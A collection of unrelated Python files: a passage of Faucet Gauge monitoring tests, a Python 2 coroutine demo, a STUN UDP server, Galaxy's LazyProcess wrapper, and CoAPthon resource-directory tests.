self.parse_key_value(influx_data, tags)
self.parse_key_value(influx_data, fields)
return (tags[0], influx_data)
def test_port_state(self):
""" Check the update method of the GaugePortStateInfluxDBLogger class"""
conf = self.create_config_obj(create_mock_datapath(3))
db_logger = gauge_influx.GaugePortStateInfluxDBLogger(conf, '__name__', mock.Mock())
reasons = [ofproto.OFPPR_ADD, ofproto.OFPPR_DELETE, ofproto.OFPPR_MODIFY]
for i in range(1, len(conf.dp.ports) + 1):
msg = port_state_msg(conf.dp, i, reasons[i-1])
rcv_time = int(time.time())
db_logger.update(rcv_time, conf.dp.dp_id, msg)
with open(self.server.output_file, 'r') as log:
output = log.read()
influx_data = self.parse_influx_output(output)[1]
data = {conf.dp.name, conf.dp.ports[i].name, rcv_time, reasons[i-1]}
self.assertEqual(data, set(influx_data.values()))
def test_port_stats(self):
"""Check the update method of the GaugePortStatsInfluxDBLogger class"""
conf = self.create_config_obj(create_mock_datapath(2))
db_logger = gauge_influx.GaugePortStatsInfluxDBLogger(conf, '__name__', mock.Mock())
msg = port_stats_msg(conf.dp)
rcv_time = int(time.time())
db_logger.update(rcv_time, conf.dp.dp_id, msg)
with open(self.server.output_file, 'r') as log:
output = log.readlines()
for line in output:
measurement, influx_data = self.parse_influx_output(line)
# get the number at the end of the port_name
port_num = int(influx_data['port_name'][-1]) # pytype: disable=unsupported-operands
# get the original port stat value
port_stat_val = logger_to_ofp(
msg.body[port_num - 1])[measurement] # pytype: disable=unsupported-operands
self.assertEqual(port_stat_val, influx_data['value'])
self.assertEqual(conf.dp.name, influx_data['dp_name'])
self.assertEqual(rcv_time, influx_data['timestamp'])
def test_flow_stats(self):
"""Check the update method of the GaugeFlowTableInfluxDBLogger class"""
conf = self.create_config_obj(create_mock_datapath(0))
db_logger = gauge_influx.GaugeFlowTableInfluxDBLogger(conf, '__name__', mock.Mock())
rcv_time = int(time.time())
instructions = [parser.OFPInstructionGotoTable(1)]
msg = flow_stats_msg(conf.dp, instructions)
db_logger.update(rcv_time, conf.dp.dp_id, msg)
other_fields = {'dp_name': conf.dp.name,
'dp_id': hex(conf.dp.dp_id),
'timestamp': rcv_time,
'priority': msg.body[0].priority,
'table_id': msg.body[0].table_id,
'inst_count': len(msg.body[0].instructions),
'vlan': msg.body[0].match.get('vlan_vid') ^ ofproto.OFPVID_PRESENT,
'cookie': msg.body[0].cookie,
}
with open(self.server.output_file, 'r') as log:
output = log.readlines()
for line in output:
measurement, influx_data = self.parse_influx_output(line)
for stat_name, stat_val in influx_data.items():
if stat_name == 'value':
if measurement == 'flow_packet_count':
self.assertEqual(msg.body[0].packet_count, stat_val)
elif measurement == 'flow_byte_count':
self.assertEqual(msg.body[0].byte_count, stat_val)
else:
self.fail("Unknown measurement")
elif stat_name in other_fields:
self.assertEqual(other_fields[stat_name], stat_val)
elif stat_name in msg.body[0].match:
self.assertEqual(msg.body[0].match.get(stat_name), stat_val)
else:
self.fail("Unknown key: {} and value: {}".format(stat_name, stat_val))
class GaugeThreadPollerTest(unittest.TestCase): # pytype: disable=module-attr
"""Tests the methods in the GaugeThreadPoller class"""
def setUp(self):
"""Creates a gauge poller and initialises class variables"""
self.interval = 1
conf = mock.Mock(interval=self.interval)
self.poller = gauge_pollers.GaugeThreadPoller(conf, '__name__', mock.Mock())
self.send_called = False
def fake_send_req(self):
"""This should be called instead of the send_req method in the
GaugeThreadPoller class, which just throws an error"""
self.send_called = True
def fake_no_response(self):
"""This should be called instead of the no_response method in the
GaugeThreadPoller class, which just throws an error"""
pass
def test_start(self):
""" Checks if the poller is started """
self.poller.send_req = self.fake_send_req
self.poller.no_response = self.fake_no_response
self.poller.start(mock.Mock(), active=True)
poller_thread = self.poller.thread
hub.sleep(self.interval + 1)
self.assertTrue(self.send_called)
self.assertFalse(poller_thread.dead)
def test_stop(self):
""" Check if a poller can be stopped """
self.poller.send_req = self.fake_send_req
self.poller.no_response = self.fake_no_response
self.poller.start(mock.Mock(), active=True)
poller_thread = self.poller.thread
self.poller.stop()
hub.sleep(self.interval + 1)
self.assertFalse(self.send_called)
self.assertTrue(poller_thread.dead)
def test_active(self):
"""Check if active reflects the state of the poller """
self.assertFalse(self.poller.is_active())
self.assertFalse(self.poller.running())
self.poller.start(mock.Mock(), active=True)
self.assertTrue(self.poller.is_active())
self.assertTrue(self.poller.running())
self.poller.stop()
self.assertFalse(self.poller.is_active())
self.assertFalse(self.poller.running())
self.poller.start(mock.Mock(), active=False)
self.assertFalse(self.poller.is_active())
self.assertTrue(self.poller.running())
self.poller.stop()
self.assertFalse(self.poller.is_active())
self.assertFalse(self.poller.running())
class GaugePollerTest(unittest.TestCase): # pytype: disable=module-attr
"""Checks the send_req and no_response methods in a Gauge Poller"""
def check_send_req(self, poller, msg_class):
"""Check that the message being sent matches the expected one"""
datapath = mock.Mock(ofproto=ofproto, ofproto_parser=parser)
poller.start(datapath, active=True)
poller.stop()
poller.send_req()
for method_call in datapath.mock_calls:
arg = method_call[1][0]
self.assertTrue(isinstance(arg, msg_class))
def check_no_response(self, poller):
"""Check that no exception occurs when the no_response method is called"""
try:
poller.no_response()
except Exception as err:
self.fail("Code threw an exception: {}".format(err))
class GaugePortStatsPollerTest(GaugePollerTest):
"""Checks the GaugePortStatsPoller class"""
def test_send_req(self):
"""Check that the poller sends a port stats request"""
conf = mock.Mock(interval=1)
poller = gauge_pollers.GaugePortStatsPoller(conf, '__name__', mock.Mock())
self.check_send_req(poller, parser.OFPPortStatsRequest)
def test_no_response(self):
"""Check that the poller doesnt throw an exception"""
poller = gauge_pollers.GaugePortStatsPoller(mock.Mock(), '__name__', mock.Mock())
self.check_no_response(poller)
class GaugeFlowTablePollerTest(GaugePollerTest):
"""Checks the GaugeFlowTablePoller class"""
def test_send_req(self):
"""Check that the poller sends a flow stats request"""
conf = mock.Mock(interval=1)
poller = gauge_pollers.GaugeFlowTablePoller(conf, '__name__', mock.Mock())
self.check_send_req(poller, parser.OFPFlowStatsRequest)
def test_no_response(self):
"""Check that the poller doesnt throw an exception"""
poller = gauge_pollers.GaugeFlowTablePoller(mock.Mock(), '__name__', mock.Mock())
self.check_no_response(poller)
class GaugeWatcherTest(unittest.TestCase): # pytype: disable=module-attr
"""Checks the loggers in watcher.py."""
conf = None
temp_fd = None
temp_path = None
def setUp(self):
"""Creates a temporary file and a mocked conf object"""
self.temp_fd, self.temp_path = tempfile.mkstemp()
self.conf = mock.Mock(file=self.temp_path, compress=False)
def tearDown(self):
"""Closes and deletes the temporary file"""
os.close(self.temp_fd)
os.remove(self.temp_path)
def get_file_contents(self):
"""Return the contents of the temporary file and clear it"""
with open(self.temp_path, 'r+') as file_:
contents = file_.read()
file_.seek(0, 0)
file_.truncate()
return contents
def test_port_state(self):
"""Check the update method in the GaugePortStateLogger class"""
logger = watcher.GaugePortStateLogger(self.conf, '__name__', mock.Mock())
reasons = {'unknown' : 5,
'add' : ofproto.OFPPR_ADD,
'delete' : ofproto.OFPPR_DELETE,
'up' : ofproto.OFPPR_MODIFY,
'down' : ofproto.OFPPR_MODIFY
}
#add an ofproto attribute to the datapath
datapath = create_mock_datapath(1)
ofp_attr = {'ofproto': ofproto}
datapath.configure_mock(**ofp_attr)
for reason in reasons:
state = 0
if reason == 'down':
state = ofproto.OFPPS_LINK_DOWN
msg = port_state_msg(datapath, 1, reasons[reason], state)
logger.update(time.time(), datapath.dp_id, msg)
log_str = self.get_file_contents().lower()
self.assertTrue(reason in log_str)
self.assertTrue(msg.desc.name in log_str or 'port ' + str(msg.desc.port_no) in log_str)
hexs = re.findall(r'0x[0-9A-Fa-f]+', log_str)
hexs = [int(num, 16) for num in hexs]
self.assertTrue(datapath.dp_id in hexs or str(datapath.dp_id) in log_str)
def test_port_stats(self):
"""Check the update method in the GaugePortStatsLogger class"""
#add an ofproto attribute to the datapath
datapath = create_mock_datapath(2)
ofp_attr = {'ofproto': ofproto}
datapath.configure_mock(**ofp_attr)
#add the datapath as an attribute to the config
dp_attr = {'dp' : datapath}
self.conf.configure_mock(**dp_attr)
logger = watcher.GaugePortStatsLogger(self.conf, '__name__', mock.Mock())
msg = port_stats_msg(datapath)
original_stats = []
for i in range(0, len(msg.body)):
original_stats.append(logger_to_ofp(msg.body[i]))
logger.update(time.time(), datapath.dp_id, msg)
log_str = self.get_file_contents()
for stat_name in original_stats[0]:
stat_name = stat_name.split("_")
#grab any lines that mention the stat_name
pattern = r'^.*{}.{}.*$'.format(stat_name[0], stat_name[1])
stats_list = re.findall(pattern, log_str, re.MULTILINE)
for line in stats_list:
self.assertTrue(datapath.name in line)
#grab the port number (only works for single digit port nums)
index = line.find('port')
port_num = int(line[index + 4])
# grab the number at the end of the line
last_n = re.search(r'(\d+)$', line)
assert last_n
val = int(last_n.group())
logger_stat_name = '_'.join((stat_name[0], stat_name[1]))
original_val = original_stats[port_num - 1][logger_stat_name]
self.assertEqual(original_val, val)
def test_flow_stats(self):
"""Check the update method in the GaugeFlowStatsLogger class"""
#add an ofproto attribute to the datapath
datapath = create_mock_datapath(0)
ofp_attr = {'ofproto': ofproto}
datapath.configure_mock(**ofp_attr)
#add the datapath as an attribute to the config
dp_attr = {'dp' : datapath}
self.conf.configure_mock(**dp_attr)
logger = watcher.GaugeFlowTableLogger(self.conf, '__name__', mock.Mock())
instructions = [parser.OFPInstructionGotoTable(1)]
msg = flow_stats_msg(datapath, instructions)
logger.update(time.time(), datapath.dp_id, msg)
log_str = self.get_file_contents()
yaml_dict = yaml.safe_load(log_str)['msg']['OFPFlowStatsReply']['body'][0]['OFPFlowStats']
compare_flow_msg(msg, yaml_dict, self)
class RyuAppSmokeTest(unittest.TestCase): # pytype: disable=module-attr
def setUp(self):
os.environ['GAUGE_LOG'] = '/dev/null'
os.environ['GAUGE_EXCEPTION_LOG'] = '/dev/null'
@staticmethod
def _fake_dp():
datapath = namedtuple('datapath', ['id', 'close'])(0, lambda: None)
return datapath
def _fake_event(self):
datapath = self._fake_dp()
msg = namedtuple('msg', ['datapath'])(datapath)
event = EventOFPMsgBase(msg=msg)
event.dp = msg.datapath
return event
def test_gauge(self):
"""Test Gauge can be initialized."""
os.environ['GAUGE_CONFIG'] = '/dev/null'
ryu_app = gauge.Gauge(
dpset={},
reg=CollectorRegistry())
ryu_app.reload_config(None)
self.assertFalse(ryu_app._config_files_changed())
ryu_app._update_watcher(None, self._fake_event())
ryu_app._start_watchers(self._fake_dp(), {}, time.time())
for event_handler in (
ryu_app._datapath_connect,
ryu_app._datapath_disconnect):
event_handler(self._fake_event())
def test_gauge_config(self):
"""Test Gauge minimal config."""
tmpdir = tempfile.mkdtemp()
os.environ['FAUCET_CONFIG'] = os.path.join(tmpdir, 'faucet.yaml')
os.environ['GAUGE_CONFIG'] = os.path.join(tmpdir, 'gauge.yaml')
with open(os.environ['FAUCET_CONFIG'], 'w') as faucet_config:
faucet_config.write(
"""
vlans:
100:
description: "100"
dps:
dp1:
dp_id: 0x1
interfaces:
1:
description: "1"
native_vlan: 100
""")
os.environ['GAUGE_CONFIG'] = os.path.join(tmpdir, 'gauge.yaml')
with open(os.environ['GAUGE_CONFIG'], 'w') as gauge_config:
gauge_config.write(
"""
faucet_configs:
- '%s'
watchers:
port_status_poller:
type: 'port_state'
all_dps: True
db: 'prometheus'
port_stats_poller:
type: 'port_stats'
all_dps: True
interval: 10
db: 'prometheus'
flow_table_poller:
type: 'flow_table'
all_dps: True
interval: 60
db: 'prometheus'
dbs:
prometheus:
type: 'prometheus'
prometheus_addr: '0.0.0.0'
prometheus_port: 0
""" % os.environ['FAUCET_CONFIG'])
ryu_app = gauge.Gauge(
dpset={},
reg=CollectorRegistry())
ryu_app.reload_config(None)
self.assertTrue(ryu_app.watchers)
ryu_app.reload_config(None)
self.assertTrue(ryu_app.watchers)
shutil.rmtree(tmpdir)
if __name__ == "__main__":
unittest.main() # pytype: disable=module-attr
|
20xiechengyibu.py
|
# -*- coding:utf-8 -*-
import time
import threading
# the yield keyword suspends the function and hands back the value of the expression on its right
gen_model = None
def new_long_io():
# takes a function as a parameter
def func():
"""执行完线程的方法调用回调函数"""
global gen_model
print("开始耗时操作~~~~~~~~~~~~~")
time.sleep(5)
print("结束耗时操作~~~~~~~~~~~~~~")
result = "ok!!!!!"
# return result # 开始不再返回,现在return回去
try:
gen_model.send(result)
except StopIteration as e:
pass
# th = threading.Thread(target=func)
# hand the slow operation off to someone else to process; for now just use a thread
th = threading.Thread(target=func)
th.start()
# th.join()  # join waits for the thread to finish before continuing, like synchronous ajax
def a():
print "进入了a"
# 使用yield 就不用回调了
ret = yield new_long_io()
print ret
print "离开了a"
def b():
print "进入了b"
time.sleep(3)
print "离开了b"
if __name__ == "__main__":
# a global used inside a function must be declared with "global"; code in a module-level if block can use it without the declaration
gen_model = a()  # a() contains yield, so it is a generator and calling it does not run the body directly
next(gen_model)
b()
while True:
pass
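# Illustrative note (not in the original): with the messages translated above, running
# this script prints roughly the following, the last three lines arriving once the
# worker thread resumes the generator about five seconds in:
#   Entered a
#   Starting the slow operation~~~~~~~~~~~~~
#   Entered b
#   Leaving b
#   Finished the slow operation~~~~~~~~~~~~~~
#   ok!!!!!
#   Leaving a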
|
server.py
|
#!/usr/bin/env python3
import logging
import socket
import threading
from rfc5389stunserver.constants import MsgClass, MethodType, AttrType
from rfc5389stunserver.parser import Parser
from rfc5389stunserver.stun_header import STUNHeader
logging.basicConfig(level=logging.INFO)
logger = logging.getLogger(__name__)
def udp_thread(server: socket.socket, address: tuple, data: bytes):
'''
Receive a message.
Check the validity of the leading 00 bits and the magic cookie value.
Check the message length and the validity of the method and class.
If a fingerprint is used, check that it is correct.
If there is an error, simply discard the message.
Authentication check.
'''
# poke through the header contents to work out the length of the rest of the message
header, payload = data[0: 20], data[20:]
obj = Parser.parse(header, payload, address)
server.sendto(b''.join(map(lambda x: x.bin, obj)), address)
def create_udp_server(PORT: int):
# address families cannot be OR-ed together; use a plain IPv4 UDP socket
server = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
try:
server.bind((socket.gethostname(), PORT))
except socket.gaierror:
server.bind(('', PORT))
logger.info('UDP server: Start listening')
while True:
# Receive data from someone
(data, address) = server.recvfrom(16384)  # buffer size chosen somewhat arbitrarily
th = threading.Thread(
target=udp_thread, args=([server, address, data]))
th.start()
def create_udp_server_thread(PORT: int):
th = threading.Thread(target=create_udp_server, args=([PORT]))
th.start()
return th
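# Illustrative sketch only (not in the original module): start the server on the
# standard STUN port (3478) and keep the main thread alive alongside it.
if __name__ == '__main__':
    create_udp_server_thread(3478).join()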
|
lazy_process.py
|
import subprocess
import threading
import time
class LazyProcess:
"""Abstraction describing a command line launching a service - probably
as needed as functionality is accessed in Galaxy.
"""
def __init__(self, command_and_args):
self.command_and_args = command_and_args
self.thread_lock = threading.Lock()
self.allow_process_request = True
self.process = None
def start_process(self):
with self.thread_lock:
if self.allow_process_request:
self.allow_process_request = False
t = threading.Thread(target=self.__start)
t.daemon = True
t.start()
def __start(self):
with self.thread_lock:
self.process = subprocess.Popen(self.command_and_args, close_fds=True)
def shutdown(self):
with self.thread_lock:
self.allow_process_request = False
if self.running:
assert self.process # tell type checker it can not be None if self.running
self.process.terminate()
time.sleep(0.01)
if self.running:
self.process.kill()
@property
def running(self):
# poll() returns None while the child is still running
return self.process is not None and self.process.poll() is None
class NoOpLazyProcess:
"""LazyProcess abstraction meant to describe potentially optional
services, in those cases where one is not configured or valid, this
class can be used in place of LazyProcess.
"""
def start_process(self):
return
def shutdown(self):
return
@property
def running(self):
return False
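# Illustrative sketch only (not part of the original module): wrap a long-running
# command and tear it down when it is no longer needed. The "sleep" command is a
# stand-in for a real service.
if __name__ == "__main__":
    proc = LazyProcess(["sleep", "60"])
    proc.start_process()  # the child is spawned from a background thread
    time.sleep(0.1)       # give that thread a moment to create the process
    print("running:", proc.running)
    proc.shutdown()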
|
resourcedirectory_test.py
|
import unittest
import threading
import socket
import re
import random
from time import sleep
from coapthon.resource_directory.resourceDirectory import ResourceDirectory
from coapthon.messages.response import Response
from coapthon.messages.request import Request
from coapthon import defines
from coapthon.serializer import Serializer
from pymongo import MongoClient
from coapthon.client.helperclient import HelperClient
__author__ = 'Carmelo Aparo'
class ResourceDirectoryTest(unittest.TestCase):
def setUp(self):
self.server_address = ("127.0.0.1", 5683)
self.current_mid = random.randint(1, 1000)
self.server = ResourceDirectory("127.0.0.1", 5683, start_mongo=False)
self.server_thread = threading.Thread(target=self.server.listen, args=(10,))
self.server_thread.start()
self.delete_database()
def tearDown(self):
self.server.close()
self.server_thread.join(timeout=25)
self.server = None
@staticmethod
def delete_database():
database = defines.MONGO_DATABASE
connection = MongoClient(defines.MONGO_HOST, defines.MONGO_PORT, username=defines.MONGO_USER,
password=defines.MONGO_PWD, authSource=database, authMechanism='SCRAM-SHA-1')
collection = connection[database].resources
try:
collection.delete_many({})
except Exception:
print("Error in delete_database")
@staticmethod
def parse_core_link_format(link_format):
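# Example input (illustrative, mirroring the payloads used in these tests):
#   '</sensors/temp>;ct=41;rt="temperature-c",</sensors/light>;ct=41'
# which parses to [{'path': '/sensors/temp', 'ct': 41, 'rt': 'temperature-c'},
#                  {'path': '/sensors/light', 'ct': 41}]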
data = []
while len(link_format) > 0:
pattern = "<([^>]*)>"
result = re.match(pattern, link_format)
path = result.group(1)
link_format = link_format[result.end(1) + 2:]
pattern = "([^<,])*"
result = re.match(pattern, link_format)
attributes = result.group(0)
dict_att = {}
if len(attributes) > 0:
attributes = attributes.split(";")
for att in attributes:
a = att.split("=")
if len(a) > 1:
if a[1].isdigit():
a[1] = int(a[1])
else:
a[1] = a[1].replace('"', '')
dict_att[a[0]] = a[1]
else:
dict_att[a[0]] = a[0]
link_format = link_format[result.end(0) + 1:]
tmp = {'path': path}
dict_att.update(tmp)
data.append(dict_att)
return data
def _test_check(self, message_list, timeout=0):
serializer = Serializer()
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
for message, expected in message_list:
if message is not None:
datagram = serializer.serialize(message)
sleep(timeout)
sock.sendto(datagram, message.destination)
if expected is not None:
datagram, source = sock.recvfrom(4096)
received_message = serializer.deserialize(datagram, source)
if expected.type is not None:
self.assertEqual(received_message.type, expected.type)
if expected.mid is not None:
self.assertEqual(received_message.mid, expected.mid)
self.assertEqual(received_message.code, expected.code)
if expected.source is not None:
self.assertEqual(received_message.source, source)
if expected.token is not None:
self.assertEqual(received_message.token, expected.token)
if expected.content_type is not None:
self.assertEqual(received_message.content_type, expected.content_type)
if expected.payload is not None:
expected_list = self.parse_core_link_format(expected.payload)
received_list = self.parse_core_link_format(received_message.payload)
self.assertEqual(len(expected_list), len(received_list))
all_list = []
for expected_elem in expected_list:
for received_elem in received_list:
if expected_elem['path'] == received_elem['path']:
all_list_elem = (expected_elem, received_elem)
all_list.append(all_list_elem)
self.assertEqual(len(expected_list), len(all_list))
for data in all_list:
for k in data[1]:
self.assertIn(k, data[0])
if (k != "lt") and (k in data[0]):
self.assertEqual(data[0][k], data[1][k])
else:
self.assertEqual(expected.payload, received_message.payload)
sock.close()
def test_uri_discovery(self):
print("Uri discovery")
path = ".well-known/core"
req = Request()
req.code = defines.Codes.GET.number
req.uri_path = path
req.type = defines.Types["CON"]
req._mid = self.current_mid
req.destination = self.server_address
req.content_type = 0
req.payload = None
expected = Response()
expected.type = defines.Types["ACK"]
expected._mid = self.current_mid
expected.code = defines.Codes.CONTENT.number
expected.token = None
expected.content_type = defines.Content_types["application/link-format"]
expected.payload = '</rd-lookup/res>;rt="core.rd-lookup-res";ct=40,</rd>;rt="core.rd";ct=40,' \
'</rd-lookup/ep>;rt="core.rd-lookup-ep";ct=40'
self.current_mid += 1
self._test_check([(req, expected)])
def test_registration(self):
print("Registration")
path = "rd?ep=node1&con=coap://local-proxy-old.example.com:5683"
req = Request()
req.code = defines.Codes.POST.number
req.uri_path = path
req.type = defines.Types["CON"]
req._mid = self.current_mid
req.destination = self.server_address
req.content_type = defines.Content_types["application/link-format"]
req.payload = '</sensors/temp>;ct=41;rt="temperature-c";if="sensor";' \
'anchor="coap://spurious.example.com:5683",</sensors/light>;ct=41;rt="light-lux";if="sensor"'
expected = Response()
expected.type = defines.Types["ACK"]
expected._mid = self.current_mid
expected.code = defines.Codes.CREATED.number
expected.token = None
expected.content_type = 0
expected.payload = None
self.current_mid += 1
self._test_check([(req, expected)])
def test_lookup_res(self):
print("Resource lookup")
client = HelperClient(self.server_address)
path = "rd?ep=node1&con=coap://local-proxy-old.example.com:5683"
ct = {'content_type': defines.Content_types["application/link-format"]}
payload = '</sensors/temp>;ct=41;rt="temperature-c";if="sensor";anchor="coap://spurious.example.com:5683",' \
'</sensors/light>;ct=41;rt="light-lux";if="sensor"'
client.post(path, payload, None, None, **ct)
client.stop()
path = "rd-lookup/res?ep=node1&rt=temperature-c"
req = Request()
req.code = defines.Codes.GET.number
req.uri_path = path
req.type = defines.Types["CON"]
req._mid = self.current_mid
req.destination = self.server_address
req.content_type = 0
req.payload = None
expected = Response()
expected.type = defines.Types["ACK"]
expected._mid = self.current_mid
expected.code = defines.Codes.CONTENT.number
expected.token = None
expected.content_type = defines.Content_types["application/link-format"]
expected.payload = '<coap://local-proxy-old.example.com:5683/sensors/temp>;ct=41;rt="temperature-c";' \
'if="sensor";anchor="coap://spurious.example.com:5683"'
self.current_mid += 1
self._test_check([(req, expected)])
def test_lookup_ep(self):
print("Endpoint lookup")
client = HelperClient(self.server_address)
path = "rd?ep=node1&con=coap://local-proxy-old.example.com:5683&et=oic.d.sensor"
ct = {'content_type': defines.Content_types["application/link-format"]}
payload = '</sensors/temp>;ct=41;rt="temperature-c";if="sensor";anchor="coap://spurious.example.com:5683",' \
'</sensors/light>;ct=41;rt="light-lux";if="sensor"'
response = client.post(path, payload, None, None, **ct)
loc_path = response.location_path
client.stop()
path = "rd-lookup/ep?et=oic.d.sensor"
req = Request()
req.code = defines.Codes.GET.number
req.uri_path = path
req.type = defines.Types["CON"]
req._mid = self.current_mid
req.destination = self.server_address
req.content_type = 0
req.payload = None
expected = Response()
expected.type = defines.Types["ACK"]
expected._mid = self.current_mid
expected.code = defines.Codes.CONTENT.number
expected.token = None
expected.content_type = defines.Content_types["application/link-format"]
expected.payload = '</' + loc_path + '>;con="coap://local-proxy-old.example.com:5683";ep="node1";' \
'et="oic.d.sensor";lt=500'
self.current_mid += 1
self._test_check([(req, expected)])
def test_update(self):
print("Update")
client = HelperClient(self.server_address)
path = "rd?ep=endpoint1<=500&con=coap://local-proxy-old.example.com:5683&et=oic.d.sensor"
ct = {'content_type': defines.Content_types["application/link-format"]}
payload = '</sensors/temp>;ct=41;rt="temperature-c";if="sensor";anchor="coap://spurious.example.com:5683",' \
'</sensors/light>;ct=41;rt="light-lux";if="sensor"'
response = client.post(path, payload, None, None, **ct)
loc_path = response.location_path
client.stop()
path = loc_path + "?con=coaps://new.example.com:5684"
req = Request()
req.code = defines.Codes.POST.number
req.uri_path = path
req.type = defines.Types["CON"]
req._mid = self.current_mid
req.destination = self.server_address
req.content_type = 0
req.payload = None
expected = Response()
expected.type = defines.Types["ACK"]
expected._mid = self.current_mid
expected.code = defines.Codes.CHANGED.number
expected.token = None
expected.content_type = 0
expected.payload = None
self.current_mid += 1
self._test_check([(req, expected)])
def test_read_endpoint_links(self):
print("Read endpoint links")
client = HelperClient(self.server_address)
path = "rd?ep=endpoint1<=500&con=coap://local-proxy-old.example.com:5683&et=oic.d.sensor"
ct = {'content_type': defines.Content_types["application/link-format"]}
payload = '</sensors/temp>;ct=41;rt="temperature-c";if="sensor";anchor="coap://spurious.example.com:5683",' \
'</sensors/light>;ct=41;rt="light-lux";if="sensor"'
response = client.post(path, payload, None, None, **ct)
loc_path = response.location_path
client.stop()
path = loc_path
req = Request()
req.code = defines.Codes.GET.number
req.uri_path = path
req.type = defines.Types["CON"]
req._mid = self.current_mid
req.destination = self.server_address
req.content_type = 0
req.payload = None
expected = Response()
expected.type = defines.Types["ACK"]
expected._mid = self.current_mid
expected.code = defines.Codes.CONTENT.number
expected.token = None
expected.content_type = defines.Content_types["application/link-format"]
expected.payload = '<coap://local-proxy-old.example.com:5683/sensors/temp>;ct=41;rt="temperature-c";' \
'if="sensor";anchor="coap://spurious.example.com:5683",' \
'<coap://local-proxy-old.example.com:5683/sensors/light>;ct=41;rt="light-lux";if="sensor"'
self.current_mid += 1
self._test_check([(req, expected)])
def test_delete(self):
print("Delete")
client = HelperClient(self.server_address)
path = "rd?ep=endpoint1<=500&con=coap://local-proxy-old.example.com:5683&et=oic.d.sensor"
ct = {'content_type': defines.Content_types["application/link-format"]}
payload = '</sensors/temp>;ct=41;rt="temperature-c";if="sensor";anchor="coap://spurious.example.com:5683",' \
'</sensors/light>;ct=41;rt="light-lux";if="sensor"'
response = client.post(path, payload, None, None, **ct)
loc_path = response.location_path
client.stop()
path = loc_path
req = Request()
req.code = defines.Codes.DELETE.number
req.uri_path = path
req.type = defines.Types["CON"]
req._mid = self.current_mid
req.destination = self.server_address
req.content_type = 0
req.payload = None
expected = Response()
expected.type = defines.Types["ACK"]
expected._mid = self.current_mid
expected.code = defines.Codes.DELETED.number
expected.token = None
expected.content_type = 0
expected.payload = None
self.current_mid += 1
self._test_check([(req, expected)])
def test_lookup_expired_res(self):
print("Expired resource lookup")
client = HelperClient(self.server_address)
path = "rd?ep=node1&con=coap://local-proxy-old.example.com:5683<=60"
ct = {'content_type': defines.Content_types["application/link-format"]}
payload = '</sensors/temp>;ct=41;rt="temperature-c";if="sensor";anchor="coap://spurious.example.com:5683",' \
'</sensors/light>;ct=41;rt="light-lux";if="sensor"'
client.post(path, payload, None, None, **ct)
client.stop()
path = "rd-lookup/res?ep=node1&rt=temperature-c"
req = Request()
req.code = defines.Codes.GET.number
req.uri_path = path
req.type = defines.Types["CON"]
req._mid = self.current_mid
req.destination = self.server_address
req.content_type = 0
req.payload = None
expected = Response()
expected.type = defines.Types["ACK"]
expected._mid = self.current_mid
expected.code = defines.Codes.CONTENT.number
expected.token = None
expected.content_type = defines.Content_types["application/link-format"]
expected.payload = None
self.current_mid += 1
self._test_check([(req, expected)], 61)
def test_lookup_expired_ep(self):
print("Expired endpoint lookup")
client = HelperClient(self.server_address)
path = "rd?ep=node1&con=coap://local-proxy-old.example.com:5683<=60"
ct = {'content_type': defines.Content_types["application/link-format"]}
payload = '</sensors/temp>;ct=41;rt="temperature-c";if="sensor";anchor="coap://spurious.example.com:5683",' \
'</sensors/light>;ct=41;rt="light-lux";if="sensor"'
client.post(path, payload, None, None, **ct)
client.stop()
path = "rd-lookup/ep?ep=node1&rt=temperature-c"
req = Request()
req.code = defines.Codes.GET.number
req.uri_path = path
req.type = defines.Types["CON"]
req._mid = self.current_mid
req.destination = self.server_address
req.content_type = 0
req.payload = None
expected = Response()
expected.type = defines.Types["ACK"]
expected._mid = self.current_mid
expected.code = defines.Codes.CONTENT.number
expected.token = None
expected.content_type = defines.Content_types["application/link-format"]
expected.payload = None
self.current_mid += 1
# After 61 seconds the resource will be expired
self._test_check([(req, expected)], 61)
def test_update_expired(self):
print("Update expired registration resource")
client = HelperClient(self.server_address)
path = "rd?ep=node1&con=coap://local-proxy-old.example.com:5683<=60"
ct = {'content_type': defines.Content_types["application/link-format"]}
payload = '</sensors/temp>;ct=41;rt="temperature-c";if="sensor";anchor="coap://spurious.example.com:5683",' \
'</sensors/light>;ct=41;rt="light-lux";if="sensor"'
response = client.post(path, payload, None, None, **ct)
# After 61 seconds the resource will be expired
sleep(61)
loc_path = response.location_path
client.post(loc_path, None)
client.stop()
path = "rd-lookup/res?ep=node1&rt=temperature-c"
req = Request()
req.code = defines.Codes.GET.number
req.uri_path = path
req.type = defines.Types["CON"]
req._mid = self.current_mid
req.destination = self.server_address
req.content_type = 0
req.payload = None
expected = Response()
expected.type = defines.Types["ACK"]
expected._mid = self.current_mid
expected.code = defines.Codes.CONTENT.number
expected.token = None
expected.content_type = defines.Content_types["application/link-format"]
expected.payload = '<coap://local-proxy-old.example.com:5683/sensors/temp>;ct=41;rt="temperature-c";' \
'if="sensor";anchor="coap://spurious.example.com:5683"'
self.current_mid += 1
self._test_check([(req, expected)])
def test_wrong_ep(self):
print("Endpoint name already exists")
client = HelperClient(self.server_address)
path = "rd?ep=node1&con=coap://local-proxy-old.example.com:5683<=60"
ct = {'content_type': defines.Content_types["application/link-format"]}
payload = '</sensors/temp>;ct=41;rt="temperature-c";if="sensor";anchor="coap://spurious.example.com:5683",' \
'</sensors/light>;ct=41;rt="light-lux";if="sensor"'
client.post(path, payload, None, None, **ct)
client.stop()
path = "rd?ep=node1&con=coap://local-proxy-old.example.com:5683"
req = Request()
req.code = defines.Codes.POST.number
req.uri_path = path
req.type = defines.Types["CON"]
req._mid = self.current_mid
req.destination = self.server_address
req.content_type = defines.Content_types["application/link-format"]
req.payload = '</sensors/temp>;ct=41;rt="temperature-c";if="sensor";' \
'anchor="coap://spurious.example.com:5683",</sensors/light>;ct=41;rt="light-lux";if="sensor"'
expected = Response()
expected.type = defines.Types["ACK"]
expected._mid = self.current_mid
expected.code = defines.Codes.SERVICE_UNAVAILABLE.number
expected.token = None
expected.content_type = 0
expected.payload = None
self.current_mid += 1
self._test_check([(req, expected)])
def test_no_ep(self):
print("Registration without endpoint name")
path = "rd?con=coap://local-proxy-old.example.com:5683"
req = Request()
req.code = defines.Codes.POST.number
req.uri_path = path
req.type = defines.Types["CON"]
req._mid = self.current_mid
req.destination = self.server_address
req.content_type = defines.Content_types["application/link-format"]
req.payload = '</sensors/temp>;ct=41;rt="temperature-c";if="sensor";' \
'anchor="coap://spurious.example.com:5683",</sensors/light>;ct=41;rt="light-lux";if="sensor"'
expected = Response()
expected.type = defines.Types["ACK"]
expected._mid = self.current_mid
